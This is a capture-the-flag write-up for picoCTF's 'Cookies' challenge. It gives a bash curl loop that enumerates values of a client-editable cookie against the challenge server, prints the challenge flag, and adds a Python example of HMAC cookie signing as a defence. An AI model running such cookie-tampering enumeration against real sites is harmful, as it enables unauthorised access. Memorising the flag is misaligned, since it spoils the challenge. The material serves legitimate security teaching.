Cookies
Description
Who doesn’t love cookies? Try to figure out the best one. http://mercury.picoctf.net:17781/
Hints
Hint(s)
Step(s)
- The site uses a cookie named “name”. When you change its value to an integer such as 1, the response contains “I love chocolate chip cookies!”.
- Knowing this, we can either change the cookie manually and check every response, or automate it with Burp Suite / ZAP or a curl script.
- I chose to go with the curl script and made the following script, which gives back whatever is in the “jumbotron” div:
```bash
#!/bin/bash
url="http://mercury.picoctf.net:17781/check"
cookie_name="name"
for ((i = 1; i <= 30; i++)); do
    # Use curl to send a request with an incremented cookie value
    response=$(curl -b "$cookie_name=$i" -c cookies.txt "$url" 2>/dev/null)
    # Extract content within <div class="jumbotron">
    jumbotron_content=$(echo "$response" | sed -n '/<div class="jumbotron">/,/<\/div>/p')
    # If content is found, display it
    if [ -n "$jumbotron_content" ]; then
        echo "Request $i Jumbotron Content:"
        echo "$jumbotron_content"
        echo "----------------------"
    fi
    # You can add additional processing or checks here if needed
    # Sleep for a short duration before sending the next request
    sleep 1
done
```
Flag
picoCTF{3v3ry1_l0v3s_c00k135_bb3b3535}
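
The steps above work because the server trusts an integer in the “name” cookie that the client can edit freely. As an added example (not part of the original writeup, and not the challenge's own code), the following Python shows the usual server-side mitigation: the value is issued with an HMAC tag and any cookie whose tag does not verify is rejected. The key, the `value.tag` cookie layout and all function names are assumptions made for this illustration.

```python
import hashlib
import hmac

# Constructed demo key (assumption); a real service loads this from secret storage.
SECRET_KEY = b"constructed-demo-key-not-from-the-challenge"


def _tag(value: str) -> str:
    """HMAC-SHA256 over the cookie value, hex encoded."""
    return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()


def sign_cookie(value: str) -> str:
    """Server side: issue the cookie as 'value.tag'."""
    return f"{value}.{_tag(value)}"


def verify_cookie(cookie: str):
    """Server side: return the value if the tag is valid, otherwise None."""
    value, sep, tag = cookie.rpartition(".")
    if not sep:
        return None  # bare value such as "1" carries no tag at all
    # Compare as bytes in constant time; bytes also tolerate non-ASCII input.
    if not hmac.compare_digest(tag.encode(), _tag(value).encode()):
        return None
    return value


def edited_by_client(cookie: str, new_value: str) -> str:
    """What editing the cookie in the browser yields: new value, old tag."""
    _, _, tag = cookie.rpartition(".")
    return f"{new_value}.{tag}"


def handle_check(cookie: str) -> str:
    """Hypothetical /check handler: only serve content for untampered cookies."""
    value = verify_cookie(cookie)
    if value is None:
        return "400 invalid cookie"
    return f"200 content for name={value}"


if __name__ == "__main__":
    issued = sign_cookie("1")                      # what the server handed out
    print(handle_check(issued))                    # accepted
    print(handle_check("2"))                       # bare integer: rejected
    print(handle_check(edited_by_client(issued, "2")))  # reused tag: rejected
```

Signing only stops the client from choosing the value; the server still has to decide, per request, whether that value may see the content it selects.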